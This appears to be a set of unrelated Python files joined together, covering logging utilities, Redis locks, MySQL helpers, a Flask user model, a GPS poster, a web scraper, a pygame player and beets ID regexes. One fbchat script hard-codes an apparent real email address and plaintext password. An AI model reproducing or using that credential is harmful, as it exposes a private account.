        # True -> keep the record, False -> drop it (logging accepts bools;
        # previously 1/0 were returned, which are truth-equivalent).
        return record.name != self.name
class CsvFormatter(logging.Formatter):
    """Format the log output as a csv.

    Each format() call emits one fully-quoted CSV row with the columns
    defined in ``self.cols``.  The header row is written into the shared
    buffer at construction time, so the FIRST formatted record is
    returned together with the header line.
    """
    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        # reusable in-memory buffer, emptied after every format() call
        self.output = io.StringIO()
        self.writer = csv.writer(self.output, quoting=csv.QUOTE_ALL)
        # column name -> extractor; dict order defines the CSV column order
        self.cols = {"name": lambda r: r.name,
                     "funcName": lambda r: r.funcName,
                     "levelname": lambda r: r.levelname,
                     "message": lambda r: r.getMessage(),
                     "threadName": lambda r: r.threadName,
                     "filename": lambda r: r.filename,
                     "lineno": lambda r: r.lineno,
                     "asctime": lambda r: datetime.datetime.utcfromtimestamp(r.created).strftime('%Y-%m-%d %H:%M:%S'),
                     "pathname": lambda r: r.pathname,
                     "exc_info": lambda r: ("{} '{}': {}".format(r.exc_info[0],
                                                                 r.exc_info[1],
                                                                 traceback.format_tb(r.exc_info[2]))
                                            if isinstance(r.exc_info, tuple)
                                            else r.exc_info),
                     "exc_text": lambda r: r.exc_text,
                     "stack_info": lambda r: r.stack_info}
        # write the header row once, up front
        self.writer.writerow(self.cols.keys())
    def format(self, record: logging.LogRecord) -> str:
        """Render `record` as one CSV row and return it (trailing newline
        stripped); the internal buffer is reset afterwards."""
        self.writer.writerow([self.formatCell(f(record)) for f in self.cols.values()])
        data = self.output.getvalue()
        self.output.truncate(0)
        self.output.seek(0)
        return data.strip()
    def formatCell(self, cell: typing.Any) -> str:
        """Stringify a cell, escaping newlines so each record stays on one line."""
        return str(cell).replace("\n", "\\n").replace("\r", "\\r")
def record_factory(name, level, fn, lno, msg, args, exc_info, func=None,
                   extra=None, sinfo=None) -> logging.LogRecord:
    """Create a record for the given parameters.
    This replaces the file name `fn`, the line number `lno` and the functions
    name `func` to the ones six entries above in the current stack. This way
    this function removes the `log_debug` calls.
    Parameters
    ----------
    name : str
        The name of the logger used to log the event represented by this
        `LogRecord`
    level : int
        The numeric level of the logging event (one of `logging.DEBUG`,
        `logging.INFO` etc.)
    pathname : str
        This is ignored
    lineno : str
        This is ignored
    msg : str
        The event description message, possibly a format string with
        placeholders for variable data.
    args : any
        Variable data to merge into the msg argument to obtain the event
        description.
    exc_info : str
        An exception tuple with the current exception information, or None
        if no exception information is available.
    func : str
        This is ignored
    sinfo : str
        A text string representing stack information from the base of the stack
        in the current thread, up to the logging call.
    Returns
    -------
    LoggingRecord
        The logging record
    """
    # extract_stack() keeps the newest `limit` frames, oldest first, so
    # frames[0] is the frame six levels above this call — i.e. the original
    # caller of the log_* helpers rather than the helpers themselves.
    # NOTE(review): this depends on a fixed call depth; confirm it matches
    # the actual logging call chain.
    frames = traceback.extract_stack(limit=7)
    frame = frames[0]
    return logging.LogRecord(name, level, frame.filename, frame.lineno,
                             msg, args, exc_info, frame.name, sinfo)
# Cache of {logger_name: {level: bool}} so repeated do_log() checks avoid
# re-walking the logger hierarchy and re-importing the config module.
__do_log_cache = {}
def do_log(logger: logging.Logger, log_level: int) -> bool:
    """Whether to log the `log_level` to the given `logger` or not.
    Parameters
    ----------
    logger : logging.Logger
        The logger object
    log_level : int
        The log level to check
    Returns
    -------
    bool
        Whether to do the log or not
    """
    global __do_log_cache
    if not isinstance(logger, logging.Logger):
        return False
    if logger.name not in __do_log_cache:
        __do_log_cache[logger.name] = {}
    if log_level not in __do_log_cache[logger.name]:
        # imported lazily to avoid a circular import; since the result is
        # cached, config changes at runtime are NOT picked up (documented
        # in log(): "Changing logging on runtime is not supported").
        from .config import ENABLED_PROGRAM_LOG_LEVELS
        __do_log_cache[logger.name][log_level] = (logger.isEnabledFor(log_level) and
                                                  log_level in ENABLED_PROGRAM_LOG_LEVELS)
    return __do_log_cache[logger.name][log_level]
def clear_do_log_cache() -> None:
    """Reset the module-level cache used by `do_log()`.

    After this call, every subsequent `do_log()` lookup is recomputed
    from the logger hierarchy and the configuration.
    """
    global __do_log_cache
    __do_log_cache = {}
def log_error(logger: logging.Logger, error: Exception,
              logging_level: typing.Optional[int]=logging.ERROR) -> None:
    """Log `error` (with its traceback) when this logger/level is enabled.

    Parameters
    ----------
    logger : logging.Logger
        The logger object
    error : Exception
        The exception to log
    logging_level : int, optional
        The level to log at, default: logging.ERROR
    """
    if not do_log(logger, logging_level):
        return
    logger.log(logging_level,
               "{}: {}".format(error.__class__.__name__, error),
               exc_info=error)
def log_debug(logger: logging.Logger, msg: str, *args,
              logging_level: typing.Optional[int]=logging.DEBUG, **kwargs) -> None:
    """Shorthand for `log()` at `logging.DEBUG`.

    Parameters
    ----------
    logger : logging.Logger
        The logger object
    msg : str
        The message to log
    logging_level : int, optional
        The level to log at, default: logging.DEBUG
    """
    log(logger, logging_level, msg, *args, **kwargs)
def log_info(logger: logging.Logger, msg: str, *args,
             logging_level: typing.Optional[int]=logging.INFO, **kwargs) -> None:
    """Shorthand for `log()` at `logging.INFO`.

    Parameters
    ----------
    logger : logging.Logger
        The logger object
    msg : str
        The message to log
    logging_level : int, optional
        The level to log at, default: logging.INFO
    """
    log(logger, logging_level, msg, *args, **kwargs)
def log(logger: logging.Logger, logging_level: typing.Optional[int], msg: str,
        *args, **kwargs) -> None:
    """Log `msg` to `logger` if logging is enabled for that level.

    All extra `args` and `kwargs` are forwarded to `Logger.log()`.
    Whether logging happens is decided by both the logging module and the
    `pylo.config` settings; the decision is cached by `do_log()`, so
    changing the logging configuration at runtime is not supported.

    Parameters
    ----------
    logger : logging.Logger
        The logger object
    msg : str
        The message to log
    logging_level : int, optional
        The level to log at
    """
    if not isinstance(logger, logging.Logger):
        return
    if do_log(logger, logging_level):
        logger.log(logging_level, msg, *args, **kwargs)
def get_logger(obj: typing.Union[str, object],
               create_msg: typing.Optional[bool]=True,
               instance_args: typing.Optional[typing.Sequence]=None,
               instance_kwargs: typing.Optional[typing.Mapping]=None) -> logging.Logger:
    """Return the ``pylo.<classname>`` logger for `obj`.

    Parameters
    ----------
    obj : object or str
        The object requesting the logger, or the name to use directly
    create_msg : bool, optional
        Whether to emit a debug message noting that `obj` was created,
        default: True
    instance_args : sequence
        The positional arguments used to create the instance
    instance_kwargs : mapping
        The keyword arguments used to create the instance
    Returns
    -------
    logging.Logger
        The logger object
    """
    classname = obj if isinstance(obj, str) else obj.__class__.__name__
    logger = logging.getLogger("pylo.{}".format(classname))
    if create_msg and do_log(logger, logging.DEBUG):
        # build " with args '...'" / " and kwargs '...'" fragments so the
        # message reads naturally whichever pieces are present
        args_text = "" if instance_args is None else " with args '{}'".format(instance_args)
        if instance_kwargs is None:
            kwargs_text = ""
        else:
            kwargs_text = " {} kwargs '{}'".format(
                "and" if args_text != "" else "with",
                instance_kwargs)
        logger.debug("Creating new instance of {}{}{}".format(classname,
                     args_text, kwargs_text))
    return logger
def create_handlers() -> typing.Sequence[logging.Handler]:
    """Create the logging handlers to write debug information into the debug
    file and the info logs into the output stream.
    Use:
    ```python
    >>> logger = logging.getLogger('pylo')
    >>> logger.setLevel(logging.DEBUG)
    >>> # add the handlers to the logger
    >>> for handler in create_handlers():
    ...     logger.addHandler(handler)
    ```
    Returns
    -------
    sequence of handlers
        The handlers to add to the logger
    """
    from .config import PROGRAM_LOG_FILE
    log_dir = os.path.dirname(PROGRAM_LOG_FILE)
    if not os.path.exists(log_dir) or not os.path.isdir(log_dir):
        # NOTE(review): mode 0o660 leaves the directory without the execute
        # bit, which prevents traversing into it on POSIX — 0o770 is the
        # usual choice; confirm the intended permissions.
        os.makedirs(log_dir, mode=0o660, exist_ok=True)
    # create file handler which logs even debug messages
    dfm = CsvFormatter()
    fh = logging.FileHandler(PROGRAM_LOG_FILE, mode="a+", encoding="utf-8")
    fh.setLevel(logging.DEBUG)
    fh.setFormatter(dfm)
    # exclude from loggings
    fh.addFilter(InvertedFilter("pylo.Datatype"))
    fh.addFilter(InvertedFilter("pylo.OptionDatatype"))
    # create console handler with a higher log level
    ifm = logging.Formatter('%(message)s (#%(lineno)d@%(name)s)')
    ch = logging.StreamHandler()
    ch.setLevel(logging.INFO)
    ch.setFormatter(ifm)
    from .config import ENABLED_PROGRAM_LOG_LEVELS
    if logging.DEBUG in ENABLED_PROGRAM_LOG_LEVELS:
        print("Logging debug information to {}".format(PROGRAM_LOG_FILE))
    return fh, ch
# print("geeks", end =" ")
# print("geeksforgeeks")
# print("geeks", end ="")
# print("geeksforgeeks")
# 2
# Hacker
# Rank
# Sample Output
# Hce akr
# Rn ak
# s = input("enter the string: ")
# for i in range(len(s)):
# if i % 2 == 0:
# print(s[i], end="")
# for i in range(len(s)):
# if i % 2 != 0:
# print(s[i])
# else:
# print(s[i])
# s = input("enter the string: ")
# # var = ' '
# for i in range(len(s)):
# if i % 2 == 0:
# print(s[i])
# var ="".join(s[i]),
# print(var)
# for i in range(len(s)):
# if i % 2 != 0:
# var ="".join(s[i])
# print(var)
# t= int(input("enter: "))
# for i in t:
# s = input("enter the string: ")
# s = input("enter the string: ")
# var ="".join(s[::2])
# print(var, end=" ")
# var ="".join(s[1::2])
# print(var)
# s = input("enter the string: ")
# print("".join(s[::2]),"".join(s[1::2]))
# Split the string into the characters at even and odd positions
# (0-based) and print them separated by a space.
s = input("enter the string: ")
even = ""
odd = ""
for idx, ch in enumerate(s):
    if idx % 2 == 0:
        even += ch
    else:
        odd += ch
print(f'{even} {odd}')
# #hacker rank soltn
# # Enter your code here. Read input from STDIN. Print output to STDOUT
# T = int(input())
# for i in range(T):
# S = input()
# odd_indexed_characters = ''
# even_indexed_characters = ''
# for i,j in enumerate(S):
# if i % 2 == 0:
# odd_indexed_characters += j
# else:
# even_indexed_characters += j
# print(f"{odd_indexed_characters} {even_indexed_characters}")
|
import patchy
from limpyd import fields, database
from limpyd.utils import make_key
from .redis_lock import LuaLock
class Lock(LuaLock):
    """MonkeyPatch of database.Lock to use LuaLock"""

    def do_release(self, expected_token):
        # When the redis client decodes responses, the stored token is a
        # str, so a bytes token must be decoded before comparison.
        decodes = self.redis.connection_pool.connection_kwargs.get('decode_responses', False)
        if decodes and isinstance(expected_token, bytes):
            expected_token = expected_token.decode()
        super(Lock, self).do_release(expected_token)


database.Lock = Lock
class FieldLock(Lock):
    """MonkeyPatch of database.Lock to use LuaLock + set blocking_timeout"""
    def __init__(self, field, timeout=5, sleep=0.01):
        """
        Save the field and create a real lock, using the correct connection
        and a computed lock key based on the names of the field and its model.
        """
        self.field = field
        # True while this instance is a re-entrant "sub-lock" (the model
        # already holds the lock for this field on the current thread)
        self.sub_lock_mode = False
        super(FieldLock, self).__init__(
            redis=field._model.get_connection(),
            name=make_key(field._model._name, 'lock-for-update', field.name),
            timeout=timeout,
            blocking_timeout=timeout,
            sleep=sleep,
        )
    def _get_already_locked_by_model(self):
        """
        A lock is self_locked if already set for the current field+model on the current
        thread.
        """
        return self.field._model._is_field_locked(self.field)
    def _set_already_locked_by_model(self, value):
        # delegate the per-thread bookkeeping to the model
        if value:
            self.field._model._mark_field_as_locked(self.field)
        else:
            self.field._model._unmark_field_as_locked(self.field)
    already_locked_by_model = property(_get_already_locked_by_model, _set_already_locked_by_model)
    def acquire(self, *args, **kwargs):
        """
        Really acquire the lock only if it's not a sub-lock. Then save the
        sub-lock status.
        """
        # non-lockable fields short-circuit to "acquired"
        if not self.field.lockable:
            return True
        if self.already_locked_by_model:
            self.sub_lock_mode = True
            return True
        self.already_locked_by_model = True
        return super(FieldLock, self).acquire(*args, **kwargs)
    def release(self, *args, **kwargs):
        """
        Really release the lock only if it's not a sub-lock. Then save the
        sub-lock status and mark the model as unlocked.
        """
        if not self.field.lockable:
            return
        # a sub-lock never releases the real lock held by its parent
        if self.sub_lock_mode:
            return
        super(FieldLock, self).release(*args, **kwargs)
        self.already_locked_by_model = self.sub_lock_mode = False
    def __exit__(self, *args, **kwargs):
        """
        Mark the model as unlocked.
        """
        super(FieldLock, self).__exit__(*args, **kwargs)
        if not self.field.lockable:
            return
        if not self.sub_lock_mode:
            self.already_locked_by_model = False
fields.FieldLock = FieldLock
# Patch Worker._main_loop to manage ConnectionError on the line ``job._cached_status = job.status.hget()``
# Without this, if an error occurs, the job won't have its final status (job_delayed and others are
# already managed in our subclass)
from limpyd_jobs.workers import Worker
# The diff below is applied textually by patchy, so it must match the
# installed limpyd_jobs source exactly — keep it byte-for-byte in sync
# when upgrading that dependency.
patchy.patch(Worker._main_loop, """\
@@ -426,7 +426,12 @@ def _main_loop(self):
trace = traceback.format_exc()
self.job_error(job, queue, e, trace)
else:
- job._cached_status = job.status.hget()
+ from redis import ConnectionError
+ from gim.core.utils import retry_if_exception
+ @retry_if_exception(ConnectionError)
+ def get_job_status():
+ return job.status.hget()
+ job._cached_status = get_job_status()
if job._cached_status == STATUSES.DELAYED:
self.job_delayed(job, queue)
elif job._cached_status == STATUSES.CANCELED:
""")
|
'''
Author: Darren Daly
Version: 1.0
'''
import mysql.connector
class UseDatabase:
    """Context manager that yields a MySQL cursor.

    Usage:
        with UseDatabase(config) as cursor:
            cursor.execute(...)
    """

    def __init__(self, configuration):
        """Store the connection settings (runs when the manager is CREATED).

        configuration: mapping with keys 'DB_HOST', 'DB_USER',
        'DB_PASSWORD' and 'DB'.
        """
        self.host = configuration['DB_HOST']
        self.user = configuration['DB_USER']
        self.password = configuration['DB_PASSWORD']
        self.db = configuration['DB']

    def __enter__(self):
        """Open the connection and return a cursor (runs BEFORE the body
        of the with statement)."""
        self.conn = mysql.connector.connect(host=self.host,
                                            user=self.user,
                                            password=self.password,
                                            database=self.db,)
        self.cursor = self.conn.cursor()
        return(self.cursor)

    def __exit__(self, exc_type, exc_value, exc_traceback):
        """Clean up AFTER the body of the with statement.

        Bug fix: previously the transaction was committed unconditionally,
        so a body that raised still persisted its partial writes.  Now the
        commit happens only on success; on an exception the transaction is
        rolled back.  The cursor/connection are closed in a finally block
        so they cannot leak if commit/rollback raise.  Any exception from
        the body is propagated to the caller (this method returns None).
        """
        try:
            if exc_type is None:
                self.conn.commit()
            else:
                self.conn.rollback()
        finally:
            self.cursor.close()
            self.conn.close()
|
# Primes below 100 via trial division: keep n when no d in [2, n) divides it.
pnum = [n for n in range(2, 100) if not any(n % d == 0 for d in range(2, n))]
print(pnum)
from app import db
from werkzeug.security import generate_password_hash, check_password_hash
class User(db.Model):
    """Application user row.

    Also provides the is_authenticated/is_active/is_anonymous/get_id
    methods expected by Flask-Login.
    """
    id = db.Column(db.Integer, primary_key=True)
    # unique display name, indexed for login lookups
    nickname = db.Column('nickname', db.String(250), unique=True , index=True)
    # stores a werkzeug password hash, never the plain-text password
    password = db.Column('password' , db.String(250))
    def is_authenticated(self):
        # every persisted user counts as authenticated
        return True
    def is_active(self):
        # no account-disabling mechanism exists
        return True
    def is_anonymous(self):
        return False
    def get_id(self):
        try:
            return unicode(self.id) # python 2
        except NameError:
            return str(self.id) # python 3
    def __repr__(self):
        return '<User %r>' % (self.nickname)
    def __init__(self , nickname ,password):
        self.nickname = nickname
        # hash on construction so the plain password is never stored
        self.set_password(password)
    def set_password(self , password):
        self.password = generate_password_hash(password)
    def check_password(self , password):
        return check_password_hash(self.password , password)
|
import requests
from time import sleep
import serial
import pynmea2
import argparse
# Read NMEA sentences from the serial GPS module and POST each RMC fix
# (latitude/longitude) to the configured host as JSON.
parser = argparse.ArgumentParser()
parser.add_argument("-host", help="Host URL. E.g: http://192.168.1.8:8080/pi")
args = parser.parse_args()
print('Using host: ',args.host)
port="/dev/ttyAMA0"
ser=serial.Serial(port, baudrate=9600, timeout=0.5)
# dataout = pynmea2.NMEAStreamReader()
while True:
    newdata=ser.readline()
    # Bug fix: Serial.readline() returns bytes on Python 3, so the prefix
    # must be compared against bytes — comparing to the str "$GPRMC" was
    # always False, and no fix was ever parsed or posted.
    if newdata[0:6] == b"$GPRMC":
        newmsg = pynmea2.parse(newdata.decode('ascii'))
        lat = newmsg.latitude
        lng = newmsg.longitude
        gps = "Latitude=" + str(lat) + ", Longitude=" + str(lng)
        print(gps)
        r = requests.post(args.host,json={
            'lat':lat,
            'lng':lng
        })
        print(r.status_code, r.reason)
    sleep(1)
import requests
from bs4 import BeautifulSoup
def ola():
    """Look up CAS numbers on tocris.com and record product name + URL.

    Reads CAS numbers (one per line) from 'new СAS_487.txt', writes
    tab-separated "CAS<TAB>name<TAB>url" rows to 'result_topric2.txt' and
    unresolved or duplicate entries to 'topric_out2.txt'.

    NOTE(review): the first 'С' of the input filename appears to be the
    Cyrillic letter U+0421, not a Latin 'C' — confirm it matches the real
    file on disk.
    """
    doubls = 0  # duplicate product links seen
    saved = 0   # successfully resolved entries
    all = 0     # total processed; NOTE(review): shadows the builtin `all`
    alert = 0   # entries whose page had no usable title
    openfile1 = open('new СAS_487.txt', "r")
    openfile2 = open('result_topric2.txt', "w")
    openfile3 = open('topric_out2.txt', "w")
    Cas_numbers = []
    links = []
    for line in openfile1:
        Cas_numbers.append(line[:-1])  # strip the trailing newline
    openfile1.close()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0'
    }
    for ele in Cas_numbers:
        str0 = ''
        all += 1
        url = 'https://www.tocris.com/search.php?Value=' + ele + '&Type=QuickSearch&SrchdFrom=Header'
        r = requests.get(url, headers=headers)
        # NOTE(review): the round-trip through test.html is unnecessary —
        # r.text could be fed to BeautifulSoup directly.
        with open('test.html', 'wb') as output_file:
            output_file.write(r.text.encode('UTF-8'))
            output_file.close()
        output_file1 = open('test.html', 'r')
        html = output_file1.read()
        output_file1.close()
        soup = BeautifulSoup(html, 'lxml')
        div = soup.find('meta', {'name': "twitter:title"})
        if div:
            name = div.get('content')
            # a title starting with "Searc" means the search found nothing
            if name[0:5] == "Searc":
                openfile3.write(ele)
                openfile3.write('\n')
                continue
            # take the title text up to the '|' separator, then drop the
            # last 10 characters of what was collected
            for ele2 in name:
                if ele2 != '|':
                    str0 += str(ele2)
                else:
                    str0 = str0[:-10]
                    break
            div1 = soup.find('link', {'rel': "canonical"})
            link = div1.get('href')
            fin_str = str(ele) + '\t' + str0 + '\t' + str(link) + '\n'
            openfile2.write(fin_str)
            print(fin_str)
            saved += 1
            if link in links:
                doubls += 1
                openfile3.write(link)
            else:
                links.append(link)
        else:
            openfile3.write(ele)
            openfile3.write('???')
            openfile3.write('\n')
            alert += 1
    openfile2.close()
    openfile3.close()
    # summary counters
    print(len(links))
    print(saved)
    print(doubls)
    print(alert)
if __name__ == "__main__":
    ola()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-26 10:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration adding ``Administrators.name``.

    NOTE: generated files like this are normally left unedited.
    """
    dependencies = [
        ('admina', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='administrators',
            name='name',
            field=models.CharField(max_length=50, null=True),
        ),
    ]
|
from fbchat import Client
from fbchat.models import *
# SECURITY NOTE(review): account credentials are hard-coded in source —
# move them to environment variables / a config file and rotate this
# password before publishing.
client = Client("lukas.grasse@uleth.ca", "parkingbot123")
thread_id = '527926877'
#client.sendMessage('hi', thread_id=thread_id, thread_type=ThreadType.USER)
# Send a local image file to the given user thread.
client.sendLocalImage('./test.jpg', message='This is a local image', thread_id=thread_id, thread_type=ThreadType.USER)
|
import functools
import os
from itertools import product
import pygame as pg
from pygame import time
from pygame.color import Color
from pygame.constants import SRCALPHA, BLEND_RGBA_MULT
from pygame.mixer import SoundType
from pygame.surface import Surface
import asset
from config import TILE_WIDTH, TILE_HEIGHT, PLAYER_SPEED, SCREEN_WIDTH, SCREEN_HEIGHT, PLAYER_HEIGHT, PLAYER_WIDTH, \
PLAYER_FRAME_ROTATION, PAINT_POWER
from game_screen import map, lighting
from game_screen.lighting import draw_light_source
# Number of movement ticks each of the 3 walk-animation frames is shown for.
PLAYER_FRAME_LENGTH = PLAYER_FRAME_ROTATION // 3
class _state:
    """Module-level mutable player state (used as a namespace, never instantiated)."""
    # world coordinates of the player's top-left corner, in pixels
    x = None
    y = None
    # counters driving the walk animation and the paint-footprint rhythm
    current_horizontal_cycle = None
    current_paint_cycle = None
    # currently displayed sprite frame
    image = None
    # sub-pixel movement remainder (millipixels) carried between frames
    remaining_millipixels = 0
    # timestamp of the previous handle_keys() call (pygame ticks)
    last_tick = None
    # facing direction in degrees; 0 means "not moving"
    current_dir = 0
    # remaining paint charge and its colour name ('blue'/'orange'/'green')
    paint_level = None
    paint_color = None
    # NOTE(review): set here but handle_keys()/init() use the module-level
    # global `footstep_sound` instead — confirm which one is intended.
    footstep_sound: SoundType = None
def draw(screen, light_mask):
    """Blit the player sprite at screen centre and add its light source."""
    # The camera is player-centred, so the sprite always draws mid-screen.
    player_screen_x = SCREEN_WIDTH / 2
    player_screen_y = SCREEN_HEIGHT / 2
    screen.blit(_state.image, (player_screen_x, player_screen_y))
    draw_light_source(light_mask, _state.x + PLAYER_WIDTH // 2,
                      _state.y + PLAYER_HEIGHT // 2, lighting.player_lightning_radius)
def _valid_position(x, y):
    """Return True when no tile under the player's bounding box collides.

    Tests the four corner offsets (0, TILE_WIDTH) x (0, TILE_HEIGHT)
    against the collision masks of the tiles they fall on, using
    tile-relative coordinates.
    """
    rel_x = x % TILE_WIDTH
    rel_y = y % TILE_HEIGHT
    return not any(any(t.is_collision(rel_x - dx, rel_y - dy)
                       for t in map.get_tile(x + dx, y + dy))
                   for (dx, dy) in product({0, TILE_WIDTH}, {0, TILE_HEIGHT}))
@functools.lru_cache(maxsize=None)
def _rotated_footstep(sprite, direction):
    """Rotate `sprite` by `direction` degrees (cached per sprite/angle).

    Bug fix: previously this cached function was defined inside
    draw_footstep(), so a brand-new lru_cache was created on every call
    and nothing was ever reused.  Hoisted to module level so the cache
    actually persists across calls.
    """
    return pg.transform.rotate(sprite, direction)


def draw_footstep(sprite):
    """Stamp one footprint of `sprite` onto the map at the player position.

    The sprite is rotated to the player's current facing direction and
    faded proportionally to the remaining paint level.
    """
    rotated_sprite = _rotated_footstep(sprite, _state.current_dir)
    rect = rotated_sprite.get_rect()
    if _state.paint_level < 1000:
        # fade the print: multiply its alpha by paint_level/1000
        alpha_mask = Surface((rotated_sprite.get_width(), rotated_sprite.get_height()), flags=SRCALPHA)
        alpha_mask.fill(Color(255, 255, 255, int(255*_state.paint_level/1000)))
        rotated_sprite = rotated_sprite.copy()
        rotated_sprite.blit(alpha_mask, (0, 0), special_flags=BLEND_RGBA_MULT)
    # NOTE(review): rect.x/rect.y of a fresh rect are always 0;
    # rect.width/rect.height were probably intended for centering — confirm.
    map.map_surface.blit(rotated_sprite, (_state.x - rect.x // 2,
                                          _state.y + PLAYER_HEIGHT // 2 - rect.y // 2))
# Footprint sprite pairs (left foot, right foot) keyed by paint colour.
FOOTPRINTS = {
    'blue': (asset.BFOOTPRINT_LEFT, asset.BFOOTPRINT_RIGHT),
    'orange': (asset.OFOOTPRINT_LEFT, asset.OFOOTPRINT_RIGHT),
    'green': (asset.GFOOTPRINT_LEFT, asset.GFOOTPRINT_RIGHT)
}
def increment_cycles():
    """Advance the animation counters by one pixel-step and drain paint.

    While paint remains, stamps a left footprint when the paint cycle
    wraps to 0 and a right footprint at 24 (the cycle wraps at 48).
    """
    _state.current_horizontal_cycle = (_state.current_horizontal_cycle + 1) % PLAYER_FRAME_ROTATION
    _state.current_paint_cycle = (_state.current_paint_cycle + 1) % (24 * 2)
    # one unit of paint is spent per pixel moved, never going below zero
    _state.paint_level = max(_state.paint_level - 1, 0)
    if _state.paint_level:
        fleft, fright = FOOTPRINTS[_state.paint_color]
        if _state.current_paint_cycle == 0:
            draw_footstep(asset.get_sprite(fleft))
        if _state.current_paint_cycle == 24:
            draw_footstep(asset.get_sprite(fright))
def add_paint(color):
    """Refill the player's paint to full power and set its colour."""
    _state.paint_color = color
    _state.paint_level = PAINT_POWER
def handle_keys():
    """Poll the arrow keys and move the player pixel by pixel.

    Movement is time-based: elapsed milliseconds * PLAYER_SPEED gives
    "millipixels"; whole pixels are applied this frame and the remainder
    carried over, so speed is framerate-independent.  The vertical and
    horizontal axes are moved and collision-checked separately, which
    lets the player slide along walls.
    """
    key = pg.key.get_pressed()
    dist = 1
    new_tick = time.get_ticks()
    tick_since_last = new_tick - _state.last_tick
    _state.last_tick = new_tick
    millipixels = (tick_since_last * PLAYER_SPEED) + _state.remaining_millipixels
    pixel_moves = millipixels // 1000
    _state.remaining_millipixels = millipixels % 1000
    for _ in range(0, pixel_moves):
        new_x = _state.x
        new_y = _state.y
        moving = False
        if key[pg.K_DOWN]:
            new_y = new_y + dist
            _state.image = asset.get_player_sprites()[0][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
            moving = True
            y_axis = -1
        elif key[pg.K_UP]:
            new_y = new_y - dist
            _state.image = asset.get_player_sprites()[3][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
            moving = True
            y_axis = 1
        else:
            y_axis = 0
        # vertical move first; revert the candidate position on collision
        if _valid_position(new_x, new_y):
            _state.x = new_x
            _state.y = new_y
        else:
            new_x = _state.x
            new_y = _state.y
        if key[pg.K_RIGHT]:
            new_x = new_x + dist
            _state.image = asset.get_player_sprites()[2][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
            moving = True
            x_axis = 1
        elif key[pg.K_LEFT]:
            new_x = new_x - dist
            moving = True
            _state.image = asset.get_player_sprites()[1][_state.current_horizontal_cycle // PLAYER_FRAME_LENGTH]
            x_axis = -1
        else:
            x_axis = 0
        # map the pressed axes to a facing angle in degrees (0 = idle)
        _state.current_dir = {
            (-1, 1): 45,
            (-1, 0): 90,
            (-1, -1): 135,
            (0, -1): 180,
            (1, -1): 225,
            (1, 0): 270,
            (1, 1): 315,
            (0, 1): 360,
            (0, 0): 0
        }[x_axis, y_axis]
        if _valid_position(new_x, new_y):
            _state.x = new_x
            _state.y = new_y
        if moving:
            increment_cycles()
            # NOTE(review): uses the module global `footstep_sound` set in
            # init(), not _state.footstep_sound; Channel(1).play restarts
            # the sample on every pixel step — confirm both are intended.
            pg.mixer.Channel(1).play(footstep_sound)
def get_x():
    # player world x in pixels
    return _state.x
def get_y():
    # player world y in pixels
    return _state.y
def get_pos():
    # (x, y) world position tuple
    return _state.x, _state.y
def init():
    """Load the footstep sound and reset all player state; call once
    before entering the game loop."""
    global footstep_sound
    footstep_sound = pg.mixer.Sound(os.path.join('assets', 'sfx_footsteps.wav'))
    footstep_sound.set_volume(0.02)
    _state.x, _state.y = map.initial_room.get_initial_position()
    _state.last_tick = time.get_ticks()
    _state.current_horizontal_cycle = 0
    _state.current_paint_cycle = 0
    _state.image = asset.get_player_sprites()[0][0]
    _state.paint_level = 0
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Helpers around the extraction of album/track ID's from metadata sources."""
import re
# Spotify IDs consist of 22 alphanumeric characters
# (zero-left-padded base62 representation of randomly generated UUID4)
# NOTE: the bare '{}' placeholder is presumably filled with the entity type
# (e.g. album/track) by the caller via str.format — the doubled braces escape
# the {22} quantifier from that substitution. TODO confirm against callers.
spotify_id_regex = {
    'pattern': r'(^|open\.spotify\.com/{}/)([0-9A-Za-z]{{22}})',
    'match_group': 2,
}

# Deezer URLs: optional language segment, optional entity-type segment, numeric ID.
deezer_id_regex = {
    'pattern': r'(^|deezer\.com/)([a-z]*/)?({}/)?(\d+)',
    'match_group': 4,
}

# Beatport release URLs end with a numeric release ID.
beatport_id_regex = {
    'pattern': r'(^|beatport\.com/release/.+/)(\d+)$',
    'match_group': 2,
}

# A note on Bandcamp: There is no such thing as a Bandcamp album or artist ID,
# the URL can be used as the identifier. The Bandcamp metadata source plugin
# works that way - https://github.com/snejus/beetcamp. Bandcamp album
# URLs usually look like: https://nameofartist.bandcamp.com/album/nameofalbum
def extract_discogs_id_regex(album_id):
    """Return the Discogs release ID embedded in *album_id*, or None.

    Accepts the formats Discogs itself uses to display/link releases:
      - a plain integer, optionally wrapped in brackets and prefixed with 'r'
        (e.g. "[r123456]"), as shown on the Discogs release page.
      - legacy URL:  discogs.com/<name of release>/release/<id>
      - legacy short URL: discogs.com/release/<id>
      - current URL: discogs.com/release/<id>-<name of release>
    See #291, #4080 and #4085 for the discussions leading up to these
    patterns. Regex has been tested here https://regex101.com/r/TOu7kw/1
    """
    candidates = (
        r'^\[?r?(?P<id>\d+)\]?$',
        r'discogs\.com/release/(?P<id>\d+)-?',
        r'discogs\.com/[^/]+/release/(?P<id>\d+)',
    )
    for pattern in candidates:
        hit = re.search(pattern, album_id)
        if hit is not None:
            return int(hit.group('id'))
    return None
|
import pymysql
# Connect to the database (host and password here are placeholders)
db = pymysql.connect(host = 'xxxxx',port = 3306,user = 'root',passwd = '****',database = 'xrhTest',charset = 'utf8')
# Obtain a cursor
cursor = db.cursor()
# Run a query
sql = 'select * from tb_stu1;'
cursor.execute(sql)
ret1 = cursor.fetchone() # fetch a single row
print(ret1)
# cur.execute('INSERT INTO tb_stu1(id,name,sex,birthday) VALUES ( 1,"小明", "男", "2015-11-02");')
## Commit pending changes to the database
# db.commit()
# Close the cursor and the database connection
cursor.close()
db.close()
|
